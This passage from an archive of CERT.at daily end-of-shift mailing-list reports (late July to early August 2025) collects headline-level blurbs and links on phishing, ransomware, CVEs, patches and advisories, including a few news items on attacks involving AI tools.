https://www.heise.de/news/Sicherheitsupdate-Phishingangriffe-auf-IBM-Operat… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (java-21-openjdk, kernel, libxml2, and lz4), Debian (exempi, ruby-graphql, and sope), Fedora (binutils, chromium, gdk-pixbuf2, libsoup3, poppler, and reposurgeon), Mageia (glib2.0 and wxgtk), Oracle (jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base and libxml2), Red Hat (kernel, pandoc, pcs, qemu-kvm, redis, and rsync), SUSE (chromedriver, coreutils, cosign, docker, gdk-pixbuf-devel, glib2, gnutls, grub2, gstreamer-plugins-base, helm, ignition, java-21-openjdk, jbigkit, jq, kernel, kubernetes1.28, kwctl, libxml2, nvidia-open-driver-G06-signed, opensc, pam-config, protobuf, python310, tgt, and valkey), and Ubuntu (linux-iot). --------------------------------------------- https://lwn.net/Articles/1032371/ ∗∗∗ Breaking NVIDIA Triton: CVE-2025-23319 - A Vulnerability Chain Leading to AI Server Takeover ∗∗∗ --------------------------------------------- Wiz Research discovers a critical vulnerability chain allowing unauthenticated attackers to take over NVIDIAs Triton Inference Server. --------------------------------------------- https://www.wiz.io/blog/nvidia-triton-cve-2025-23319-vuln-chain-to-ai-server ∗∗∗ Critical Vulnerability in NestJS Devtools: Localhost RCE via Sandbox Escape ∗∗∗ --------------------------------------------- A flawed sandbox in @nestjs/devtools-integration lets attackers run code on your machine via CSRF, leading to full Remote Code Execution (RCE). --------------------------------------------- https://socket.dev/blog/nestjs-rce-vuln ∗∗∗ VU#317469: Partner Software/Partner Web does not sanitize Report files and Note content, allowing for XSS and RCE ∗∗∗ --------------------------------------------- https://kb.cert.org/vuls/id/317469 ∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2025-0005 ∗∗∗ --------------------------------------------- https://webkitgtk.org/security/WSA-2025-0005.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 01.08.2025
by Daily end-of-shift report 01 Aug '25

01 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 31-07-2025 18:00 − Freitag 01-08-2025 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Microsoft to disable Excel workbook links to blocked file types ∗∗∗ --------------------------------------------- Microsoft has announced that it will start disabling external workbook links to blocked file types by default between October 2025 and July 2026. [..] After the rollout, Excel workbooks referencing blocked file types will display a #BLOCKED error or fail to refresh, eliminating security risks associated with accessing unsupported or high-risk file types, including, but not limited to, phishing attacks that utilize workbooks to redirect targets to malicious payloads. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-to-disable-extern… ∗∗∗ Kali Linux can now run in Apple containers on macOS systems ∗∗∗ --------------------------------------------- Cybersecurity professionals and researchers can now launch Kali Linux in a virtualized container on macOS Sequoia using Apples new containerization framework. --------------------------------------------- https://www.bleepingcomputer.com/news/security/kali-linux-can-now-run-in-ap… ∗∗∗ Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed details of a new phishing campaign that conceals malicious payloads by abusing link wrapping services from Proofpoint and Intermedia to bypass defenses. --------------------------------------------- https://thehackernews.com/2025/07/experts-detect-multi-layer-redirect.html ∗∗∗ Attackers Use Fake OAuth Apps with Tycoon Kit to Breach Microsoft 365 Accounts ∗∗∗ --------------------------------------------- Cybersecurity researchers have detailed a new cluster of activity where threat actors are impersonating enterprises with fake Microsoft OAuth applications to facilitate credential harvesting as part of account takeover attacks. "The fake Microsoft 365 applications impersonate various companies, including RingCentral, SharePoint, Adobe, and Docusign," Proofpoint said in a Thursday report. --------------------------------------------- https://thehackernews.com/2025/08/attackers-use-fake-oauth-apps-with.html ∗∗∗ Huawei, at the heart of the Post outage ∗∗∗ --------------------------------------------- The cyberattack that hit Post (and Luxembourg) last week is believed to have targeted Huawei routers and their operating software. The presence of the Chinese giant at the heart of the infrastructure raises questions. The public company says it is reserving its answers for the MPs and ministers who will meet this Thursday at 10am in parliament. --------------------------------------------- https://en.paperjam.lu/article/huawei-at-the-heart-of-the-post-outage ∗∗∗ CISA Releases Open-Source Eviction Strategies Tool for Cyber Incident Response ∗∗∗ --------------------------------------------- “How an organization approaches remediation and eviction of an incident is critically important to a successful response effort. Over the years, we have seen organizations struggle with identifying the right steps to take and the correct sequencing of actions to properly evict advanced adversaries from their enterprises,” said Jermaine Roebuck, Associate Director for Threat Hunting, CISA. “This tool will level the playing field by making it easier for IT staff and cyber defenders to coordinate efforts and achieve a successful eviction. I encourage public and private sector organizations to incorporate this capability into their incident response plans.” --------------------------------------------- https://www.cisa.gov/news-events/news/cisa-releases-open-source-eviction-st… ∗∗∗ CISA and USCG Issue Joint Advisory to Strengthen Cyber Hygiene in Critical Infrastructure ∗∗∗ --------------------------------------------- CISA, in partnership with the U.S. Coast Guard (USCG), released a joint Cybersecurity Advisory aimed at helping critical infrastructure organizations improve their cyber hygiene. [..] CISA and USCG are sharing their findings and associated mitigations to assist other critical infrastructure organizations identify potential similar issues and take proactive measures to improve their cybersecurity posture. The mitigations include best practices such as not storing passwords or credentials in plaintext, avoiding sharing local administrator account credentials, and implementing comprehensive logging. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/07/31/cisa-and-uscg-issue-join… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox and thunderbird), Debian (libcommons-lang-java, node-form-data, redis, and sope), Fedora (chromium), Mageia (slurm), Oracle (apache-commons-beanutils, firefox, kernel, redis:6, and thunderbird), Red Hat (kernel, kernel-rt, libxml2, and redis), SUSE (chromium, docker, ffmpeg-7, gnutls, kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-t, libgcrypt, rav1e, and sccache), and Ubuntu (linux-lowlatency, linux-lowlatency-hwe-6.8). --------------------------------------------- https://lwn.net/Articles/1032174/ ∗∗∗ WordPress Vulnerability & Patch Roundup — July 2025 ∗∗∗ --------------------------------------------- https://blog.sucuri.net/2025/07/wordpress-vulnerability-patch-roundup-july-… ∗∗∗ Rockwell Automation Lifecycle Services with VMware ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-212-02 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 31.07.2025
by Daily end-of-shift report 31 Jul '25

31 Jul '25

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 30-07-2025 18:00 − Donnerstag 31-07-2025 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install ∗∗∗ --------------------------------------------- The vulnerability, tracked as CVE-2025-5394, carries a CVSS score of 9.8. Security researcher Thái An has been credited with discovering and reporting the bug. According to Wordfence, the shortcoming relates to an arbitrary file upload affecting all versions of the plugin prior to and including 7.8.3. It has been addressed in version 7.8.5 released on June 16, 2025. --------------------------------------------- https://thehackernews.com/2025/07/hackers-exploit-critical-wordpress.html ∗∗∗ N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto ∗∗∗ --------------------------------------------- The North Korea-linked threat actor known as UNC4899 has been attributed to attacks targeting two different organizations by approaching their employees via LinkedIn and Telegram. --------------------------------------------- https://thehackernews.com/2025/07/n-korean-hackers-used-job-lures-cloud.html ∗∗∗ Scammers Unleash Flood of Slick Online Gaming Sites ∗∗∗ --------------------------------------------- Fraudsters are flooding Discord and other social media platforms with ads for hundreds of polished online gaming and wagering websites that lure people with free credits and eventually abscond with any cryptocurrency funds deposited by players. Here’s a closer look at the social engineering tactics and remarkable traits of this sprawling network of more than 1,200 scam sites. --------------------------------------------- https://krebsonsecurity.com/2025/07/scammers-unleash-flood-of-slick-online-… ∗∗∗ Vorsicht vor dieser iCloud Phishing-Mail ∗∗∗ --------------------------------------------- „Letzte Mitteilung: Ihre Fotos und Videos werden gelöscht – ergreifen Sie Maßnahmen!“ Mit diesem Betreff versenden Kriminelle aktuell Phishing-Mails, die scheinbar von iCloud stammen. Unter dem Vorwand, das Speicherabonnement müsse verlängert werden, versuchen sie, an Zahlungsdaten zu gelangen. --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-vor-dieser-icloud-phishing-… ∗∗∗ Patents by Silk Typhoon-linked company shed light on Beijing’s offensive hacking capabilities ∗∗∗ --------------------------------------------- SentinelOne's threat researchers pored through recent Justice Department indictments of prominent Chinese hackers and mapped out the country’s evolving web of private companies that are hired to launch cyberattacks on behalf of the government. --------------------------------------------- https://therecord.media/patents-silk-typhoon-company-beijing ∗∗∗ GreyNoise Uncovers Early Warning Signals for Emerging Vulnerabilities ∗∗∗ --------------------------------------------- It’s well known that the window between CVE disclosure and active exploitation has narrowed. But what happens before a CVE is even disclosed? In our latest research “Early Warning Signals: When Attacker Behavior Precedes New Vulnerabilities,” GreyNoise analyzed hundreds of spikes in malicious activity — scanning, brute forcing, exploit attempts, and more — targeting edge technologies. We discovered a consistent and actionable trend: in the vast majority of cases, these spikes were followed by the disclosure of a new CVE affecting the same technology within six weeks. --------------------------------------------- https://www.greynoise.io/blog/greynoise-uncovers-early-warning-signals-emer… ∗∗∗ In search of riches, hackers plant 4G-enabled Raspberry Pi in bank network ∗∗∗ --------------------------------------------- Hackers planted a Raspberry Pi equipped with a 4G modem in the network of an unnamed bank in an attempt to siphon money out of the financial institution's ATM system, researchers reported Wednesday. --------------------------------------------- https://arstechnica.com/security/2025/07/in-search-of-riches-hackers-plant-… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox, java-21-openjdk, kernel, thunderbird, and unbound), Debian (chromium and systemd), Fedora (libtiff), Oracle (java-21-openjdk, libtpms, nodejs:22, redis:7, thunderbird, and unbound), Red Hat (firefox, redis, and thunderbird), SUSE (apache2, cdi-apiserver-container, cdi-cloner-container, cdi- controller-container, cdi-importer-container, cdi-operator-container, cdi- uploadproxy-container, cdi-uploadserver-container, cont, java-11-openjdk, kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestf, libarchive, nvidia-open-driver-G06-signed, redis, and rmt-server), and Ubuntu (linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-oracle-5.15, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.14, linux-gcp, linux-gcp-6.14, linux-hwe-6.14, linux-oem-6.14, linux-raspi, linux-realtime, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gke, linux-gkeop, linux-hwe-6.8, linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oem-6.8, linux-oracle, linux, linux-aws, linux-kvm, linux-aws, linux-lts-xenial, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-fips, linux-intel-iot-realtime, linux-realtime, linux-oracle, linux-oracle-6.8, linux-realtime, and sqlite3). --------------------------------------------- https://lwn.net/Articles/1032083/ ∗∗∗ Schnell installieren: Apple fixt Zero-Day-Angriff in WebKit ∗∗∗ --------------------------------------------- Apples in der Nacht zum Mittwoch erschienene Updates für iOS, iPadOS und macOS sollten dringend schnell eingespielt werden: Wie nun erst bekannt wurde, wird damit auch ein WebKit-Bug gefixt, für den es bereits einen Exploit gibt. Dieser wird allerdings bislang nur verwendet, um Chrome-Nutzer anzugreifen, wie es in der zugehörigen NIST-Meldung heißt (CVE-2025-6558). Der Fehler wird mit "Severity: High" bewertet. Verwirrend: Apple warnt in seinen Sicherheitsunterlagen nicht vor bekannten aktiven Angriffen – offenbar, weil es für den Apple-Browser Safari noch keine entsprechenden Berichte gibt. --------------------------------------------- https://heise.de/-10505297 ∗∗∗ Sicherheitsupdate: Schwachstellen gefährden HCL BigFix Remote Control ∗∗∗ --------------------------------------------- Die Endpoint-Management-Plattform HCL BigFix ist verwundbar (CVE-2025-31965 "hoch"), und Angreifer können unbefugt Daten einsehen oder mit viel Aufwand und richtigem Timing sogar auf einen privaten Schlüssel zugreifen. Die Schwachstellen finden sich konkret in HCL BigFix Remote Control. Eine abgesicherte Version steht zum Download bereit. --------------------------------------------- https://heise.de/-10505415 ∗∗∗ CVE-2025-8292 - DSA-5968-1 chromium - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2025/msg00132.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 30.07.2025
by Daily end-of-shift report 30 Jul '25

30 Jul '25

===================== = End-of-Day report = ===================== Timeframe: Dienstag 29-07-2025 18:00 − Mittwoch 30-07-2025 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Attackers Can Use Browser Extensions to Inject AI Prompts ∗∗∗ --------------------------------------------- A brand-new cyberattack vector allows threat actors to use a poisoned browser extension to inject malicious prompts into all of the top generative AI tools on the market, including ChatGPT, Gemini, and others. --------------------------------------------- https://www.darkreading.com/vulnerabilities-threats/attackers-use-browser-e… ∗∗∗ PyPI Warns of Ongoing Phishing Campaign Using Fake Verification Emails and Lookalike Domain ∗∗∗ --------------------------------------------- The maintainers of the Python Package Index (PyPI) repository have issued a warning about an ongoing phishing attack thats targeting users in an attempt to redirect them to fake PyPI sites. The attack involves sending email messages bearing the subject line "[PyPI] Email verification" that are sent from the email address noreply(a)pypj[.]org (note that the domain is not "pypi[.]org"). --------------------------------------------- https://thehackernews.com/2025/07/pypi-warns-of-ongoing-phishing-campaign.h… ∗∗∗ 2025 Unit 42 Global Incident Response Report: Social Engineering Edition ∗∗∗ --------------------------------------------- Social engineering thrives on trust and is now boosted by AI. Unit 42 incident response data explains why its surging. We detail eight critical countermeasures. --------------------------------------------- https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-r… ∗∗∗ Google Project Zero to publicly announce bugs within a week of reporting them ∗∗∗ --------------------------------------------- The vulnerability hunters at Google Project Zero want to address what they call the "upstream patch gap," when a vendor has a fix available but the downstream product providers havent integrated it yet. --------------------------------------------- https://therecord.media/google-project-zero-publicly-announce-vulnerabiliti… ∗∗∗ Decryptor released for FunkSec ransomware; Avast works with law enforcement to help victims ∗∗∗ --------------------------------------------- Cybersecurity company Avast released a decryptor for the short-lived FunkSec ransomware and said it is assisting dozens of the gangs targets with the process. --------------------------------------------- https://therecord.media/funksec-ransomware-decryptor-avast ∗∗∗ New Choicejacking Attack Steals Data from Phones via Public Chargers ∗∗∗ --------------------------------------------- Choicejacking is a new USB attack that tricks phones into sharing data at public charging stations, bypassing security prompts in milliseconds. --------------------------------------------- https://hackread.com/choicejacking-attack-steals-data-phones-public-charger… ∗∗∗ CISA Releases Part One of Zero Trust Microsegmentation Guidance ∗∗∗ --------------------------------------------- This guidance provides a high-level overview of microsegmentation, focusing on its key concepts, associated challenges and potential benefits, and includes recommended actions to modernize network security and advance zero trust principles. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/07/29/cisa-releases-part-one-z… ===================== = Vulnerabilities = ===================== ∗∗∗ New Lenovo UEFI firmware updates fix Secure Boot bypass flaws ∗∗∗ --------------------------------------------- Lenovo is warning about high-severity BIOS flaws that could allow attackers to potentially bypass Secure Boot in all-in-one desktop PC models that use customized Insyde UEFI (Unified Extensible Firmware Interface). --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-lenovo-uefi-firmware-upd… ∗∗∗ Apple Patches Safari Vulnerability Also Exploited as Zero-Day in Google Chrome ∗∗∗ --------------------------------------------- Apple on Tuesday released security updates for its entire software portfolio, including a fix for a vulnerability that Google said was exploited as a zero-day in the Chrome web browser earlier this month. The vulnerability, tracked as CVE-2025-6558 (CVSS score: 8.8), is an incorrect validation of untrusted input in the browser's ANGLE and GPU components that could result in a sandbox escape via a crafted HTML page. --------------------------------------------- https://thehackernews.com/2025/07/apple-patches-safari-vulnerability-also.h… ∗∗∗ Critical Dahua Camera Flaws Enable Remote Hijack via ONVIF and File Upload Exploits ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed now-patched critical security flaws in the firmware of Dahua smart cameras that, if left unaddressed, could allow attackers to hijack control of susceptible devices. --------------------------------------------- https://thehackernews.com/2025/07/critical-dahua-camera-flaws-enable.html ∗∗∗ Autodesk Security Advisory 29.07.2025 ∗∗∗ --------------------------------------------- Certain Autodesk products use a shared component that is affected by multiple vulnerabilities listed below. Exploitation of these vulnerabilities can lead to code execution. Exploitation of these vulnerabilities requires user interaction. --------------------------------------------- https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0015 ∗∗∗ Sicherheitsupdates: Angreifer können auf Dell ECS und ObjectScale zugreifen ∗∗∗ --------------------------------------------- Angreifer können mit vergleichsweise wenig Aufwand auf Dell Elastic Cloud Storage (ECS) und ObjectScale zugreifen. Damit setzten Firmen unter anderem Cloudspeicher auf. Liegen dort wichtige Daten, können unbefugte Zugriffe weitreichende Folgen haben. Sicherheitsupdates schließen die Schwachstelle. --------------------------------------------- https://www.heise.de/news/Sicherheitsupdates-Angreifer-koennen-auf-Dell-ECS… ∗∗∗ Stable Channel Update for Desktop ∗∗∗ --------------------------------------------- The Stable channel has been updated to 138.0.7204.183/.184 for Windows, Mac and 138.0.7204.183 for Linux which will roll out over the coming days/weeks. This update includes 4 security fixes. --------------------------------------------- http://chromereleases.googleblog.com/2025/07/stable-channel-update-for-desk… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox, icu, kernel-rt, libtpms, redis:6, redis:7, and sqlite), Fedora (chromium and cloud-init), Oracle (icu, java-1.8.0-openjdk, java-21-openjdk, kernel, nodejs:22, perl, and sqlite), SUSE (docker, java-1_8_0-openj9, libxml2, python-starlette, and thunderbird), and Ubuntu (cloud-init, linux-azure, linux-azure-5.4, linux-azure-fips, linux-raspi, linux-raspi-5.4, and perl). --------------------------------------------- https://lwn.net/Articles/1031919/ ∗∗∗ Zahnarzt Praxis-Verwaltung-System (PVS): Sicherheitslücken beim CGM Z1 – Teil 1 ∗∗∗ --------------------------------------------- Von der Firma CompuGroup Medical (CGM) wird auch ein Praxis-Verwaltungssystem (PVS) für Zahnärzte vertrieben. Das System ist laut Firmenaussage bei über 7.000 Zahnärzten im Einsatz. Eine anonym bleiben wollende Quelle informierte mich Anfang des Jahres über potentielle Sicherheitsprobleme in dieser Software. Inzwischen hat es ein Software-Update gegeben, mit dem diese Probleme ausgeräumt sein sollten. Ich fasse mal den Sachverhalt in einigen Blog-Beiträgen zusammen. --------------------------------------------- https://www.borncity.com/blog/2025/07/30/sicherheit-beim-zahnarzt-pvs-z1/ ∗∗∗ Delta Electronics DTN Soft ∗∗∗ --------------------------------------------- According to Delta Electronics, if a version of DTN Soft prior to v2.1.0 is installed, it should be updated to v2.1.0 or later. If DTM Soft is also installed, it should be updated to v1.6.0.0 (released on March 25, 2025) or later. Successful exploitation of this vulnerability could allow an attacker to use a specially crafted project file to execute arbitrary code. --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-210-03 ∗∗∗ TP-Link Archer C50 router is vulnerable to configuration-file decryption ∗∗∗ --------------------------------------------- https://kb.cert.org/vuls/id/554637 ∗∗∗ Security update for Tenable Patch Management Fixes One Vulnerability ∗∗∗ --------------------------------------------- https://www.tenable.com/security/tns-2025-15 ∗∗∗ CISA: Security update for National Instruments LabVIEW ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-210-01 ∗∗∗ CISA: Security update for Samsung HVAC DMS ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-210-02 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 29.07.2025
by Daily end-of-shift report 29 Jul '25

29 Jul '25

===================== = End-of-Day report = ===================== Timeframe: Montag 28-07-2025 18:00 − Dienstag 29-07-2025 18:00 Handler: Guenes Holler Co-Handler: n/a ===================== = News = ===================== ∗∗∗ OpenAI’s ChatGPT Agent casually clicks through “I am not a robot” verification test ∗∗∗ --------------------------------------------- On Friday, OpenAI's new ChatGPT Agent, which can perform multistep tasks for users, proved it can pass through one of the Internet's most common security checkpoints by clicking Cloudflare's anti-bot verification—the same checkbox that's supposed to keep automated programs like itself at bay. --------------------------------------------- https://arstechnica.com/information-technology/2025/07/openais-chatgpt-agen… ∗∗∗ Exploit available for critical Cisco ISE bug exploited in attacks ∗∗∗ --------------------------------------------- Security researcher Bobby Gould has published a blog post demonstrating a complete exploit chain for CVE-2025-20281, an unauthenticated remote code execution vulnerability in Cisco Identity Services Engine (ISE). --------------------------------------------- https://www.bleepingcomputer.com/news/security/exploit-available-for-critic… ∗∗∗ Endgame Gear mouse config tool infected users with malware ∗∗∗ --------------------------------------------- Gaming peripherals maker Endgame Gear is warning that malware was hidden in its configuration tool for the OP1w 4k v2 mouse hosted on the official website between June 26 and July 9, 2025. The infected file was hosted on 'endgamegear.com/gaming-mice/op1w-4k-v2,' so users downloading the tool from that page during this period were infected. --------------------------------------------- https://www.bleepingcomputer.com/news/security/endgame-gear-mouse-config-to… ∗∗∗ Critical Flaw in Vibe-Coding Platform Base44 Exposed Apps ∗∗∗ --------------------------------------------- The rise of "vibe coding" platforms that enable developers to build software with minimal traditional coding could create a slew of new security risks for organizations. A recent example is a now-patched vulnerability in the Base44 AI-powered development platform that allowed unauthorized users to gain complete access to private enterprise applications hosted on the service. --------------------------------------------- https://www.darkreading.com/application-security/critical-flaw-vibe-coding-… ∗∗∗ Parasitic Sharepoint Exploits ∗∗∗ --------------------------------------------- Last week, newly exploited SharePoint vulnerabilities took a lot of our attention. It is fair to assume that last Monday (July 21st), all exposed vulnerable SharePoint installs were exploited. Of course, there is nothing to prevent multiple exploitation of the same instance, and a lot of that certainly happened. But why exploit it yourself if you can just take advantage of backdoors left behind by prior exploits? A number of these backdoors were widely publicised. The initial backdoor "spinstall0.aspx", was frequently observed and Microsoft listed various variations of this filename [1]. --------------------------------------------- https://isc.sans.edu/diary/rss/32148 ∗∗∗ Windows auf veraltete libcurl-Bibliotheken in Programmen überprüfen ∗∗∗ --------------------------------------------- Microsoft liefert die cURL-Bibliothek häufiger mit veralteten Versionen, die Sicherheitslücken aufweisen, aus. Auch Software-Pakete kommen mit uralten libcurl-Dateien daher. Wie kann ich prüfen, ob da irgendwelche Altlasten auf meinen Systemen schlummern? --------------------------------------------- https://www.borncity.com/blog/2025/07/29/software-und-die-veralteten-libcur… ∗∗∗ Gunra Ransomware Group Unveils Efficient Linux Variant ∗∗∗ --------------------------------------------- Gunra ransomware was first observed in April 2025 in a campaign that targeted Windows systems using techniques inspired by the infamous Conti ransomware. Our monitoring of the ransomware landscape revealed that threat actors behind Gunra have expanded with a Linux variant, signaling a strategic move toward cross-platform targeting. --------------------------------------------- https://www.trendmicro.com/en_us/research/25/g/gunra-ransomware-linux-varia… ∗∗∗ SAP NetWeaver Vulnerability Used in Auto-Color Malware Attack on US Firm ∗∗∗ --------------------------------------------- Darktrace uncovers the first exploit of a critical SAP NetWeaver vulnerability (CVE-2025-31324) to deploy Auto-Color backdoor malware. Learn how this evasive Linux RAT targets systems for remote code execution and how AI-powered defence thwarts multi-stage attacks. --------------------------------------------- https://hackread.com/sap-netweaver-vulnerability-auto-color-malware-us-firm/ ∗∗∗ Stack Overflows, Heap Overflows, and Existential Dread (SonicWall SMA100 CVE-2025-40596, CVE-2025-40597 and CVE-2025-40598) ∗∗∗ --------------------------------------------- Our initial journey started with analyzing SonicWall N-days that were receiving coveted attention from our friendly APT groups. But somewhere along the way - deep in a fog of malformed headers and reverse proxy schenanigans - we stumbled across vulnerabilities that feel like they were preserved in amber from a more naïve era of C programming. --------------------------------------------- https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-d… ∗∗∗ Security: CERT@VDE wird erste deutsche Schaltzentrale für Sicherheitslücken ∗∗∗ --------------------------------------------- Das Sicherheits- und Computer-Notfallteam des Elektrotechnik- und IT-Verbands VDE spielt international seit wenigen Tagen eine wichtigere Rolle. Die Branchenvereinigung teilte am Freitag mit, dass das eigene Computer Emergency Response Team CERT@VDE zur zentralen Stelle im Kampf gegen IT-Sicherheitslücken im Bereich der Industrieautomation mit Fokus auf kleine und mittlere Unternehmen aufgestiegen sei. Dessen Arbeit zur Koordination von Security-Problemen in diesem Sektor erhält damit eine weltweite Bedeutung. --------------------------------------------- https://heise.de/-10502241 ∗∗∗ Attacking GenAI applications and LLMs – Sometimes all it takes is to ask nicely! ∗∗∗ --------------------------------------------- Generative AI and LLM technologies have shown great potential in recent years, and for this reason, an increasing number of applications are starting to integrate them for multiple purposes. These applications are becoming increasingly complex, adopting approaches that involve multiple specialized agents, each focused on one or more tasks, interacting with one another and using external tools to access information, perform operations, or carry out tasks that LLMs are not capable of handling directly (e.g., mathematical computations). --------------------------------------------- https://security.humanativaspa.it/attacking-genai-applications-and-llms-som… ===================== = Vulnerabilities = ===================== ∗∗∗ CVE-2025-26397 - ZDI-25-654: SolarWinds TFTP Server Deserialization of Untrusted Data Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows local attackers to escalate privileges on affected installations of SolarWinds TFTP Server. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the internal TFTP communications endpoint, which listens on the localhost interface on TCP port 8099 by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-25-654/ ∗∗∗ Jetzt patchen! Attacken auf PaperCut NG/MF beobachtet ∗∗∗ --------------------------------------------- Aufgrund derzeit laufender Angriffe sollten Admins sicherstellen, dass sie eine aktuelle Ausgabe der Druckermanagementsoftware PaperCut NG/MF installiert haben. Sind Attacken erfolgreich, können Angreifer im schlimmsten Fall Schadcode auf Systeme schieben und ausführen. Sicherheitsupdates sind schon länger verfügbar. --------------------------------------------- https://www.heise.de/news/Jetzt-patchen-Attacken-auf-PaperCut-NG-MF-beobach… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (freerdp, git-lfs, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, icu, ipa, iputils, krb5, libvpx, nodejs:22, osbuild-composer, perl, python-tornado, qt6-qtbase, sqlite, unbound, valkey, wireshark, and yggdrasil), Debian (libfastjson and php8.2), Fedora (glibc), Oracle (firefox, icu, perl, and unbound), Red Hat (389-ds-base, glib2, icu, libtpms, redis:6, redis:7, and yelp), SUSE (boost, forgejo-longterm, java-11-openj9, java-17-openj9, java-1_8_0-openj9, kernel, nginx, and salt), and Ubuntu (linux-xilinx-zynqmp, openjdk-8, openjdk-lts, poppler, and sqlite3). --------------------------------------------- https://lwn.net/Articles/1031812/ ∗∗∗ Samsung Security Updates for Smart TV, Audio and Displays ∗∗∗ --------------------------------------------- https://security.samsungtv.com/securityUpdates ∗∗∗ CVE-2025-2179 GlobalProtect App: Non Admin User Can Disable the GlobalProtect App (Severity: MEDIUM) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2025-2179 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 28.07.2025
by Daily end-of-shift report 28 Jul '25

28 Jul '25

===================== = End-of-Day report = ===================== Timeframe: Freitag 25-07-2025 18:00 − Montag 28-07-2025 18:00 Handler: Felician Fuchs Co-Handler: Guenes Holler ===================== = News = ===================== ∗∗∗ Supply-chain attacks on open source software are getting out of hand ∗∗∗ --------------------------------------------- It has been a busy week for supply-chain attacks targeting open source software available in public repositories, with successful breaches of multiple developer accounts that resulted in malicious packages being pushed to unsuspecting users. --------------------------------------------- https://arstechnica.com/security/2025/07/open-source-repositories-are-seein… ∗∗∗ Amazon AI coding agent hacked to inject data wiping commands ∗∗∗ --------------------------------------------- As reported by 404 Media, on July 13, a hacker using the alias ‘lkmanka58’ added unapproved code on Amazon Q’s GitHub to inject a defective wiper that wouldn’t cause any harm, but rather sent a message about AI coding security. --------------------------------------------- https://www.bleepingcomputer.com/news/security/amazon-ai-coding-agent-hacke… ∗∗∗ Sophisticated Shuyal Stealer Targets 19 Browsers, Demonstrates Advanced Evasion ∗∗∗ --------------------------------------------- A new infostealing malware making the rounds can exfiltrate credentials and other system data even from browsing software considered more privacy-focused than mainstream options. --------------------------------------------- https://www.darkreading.com/endpoint-security/shuyal-stealer-targets-19-bro… ∗∗∗ French submarine secrets surface after cyber attack ∗∗∗ --------------------------------------------- European defence giant Naval Group has confirmed that it is investigating an alleged cyber attack which has seen what purports to be sensitive internal data published on the internet by hackers. --------------------------------------------- https://www.bitdefender.com/en-us/blog/hotforsecurity/french-submarine-secr… ∗∗∗ The Homograph Illusion: Not Everything Is As It Seems ∗∗∗ --------------------------------------------- A subtle yet dangerous email attack vector: homograph attacks. Threat actors are using visually similar, non-Latin characters to bypass security filters. --------------------------------------------- 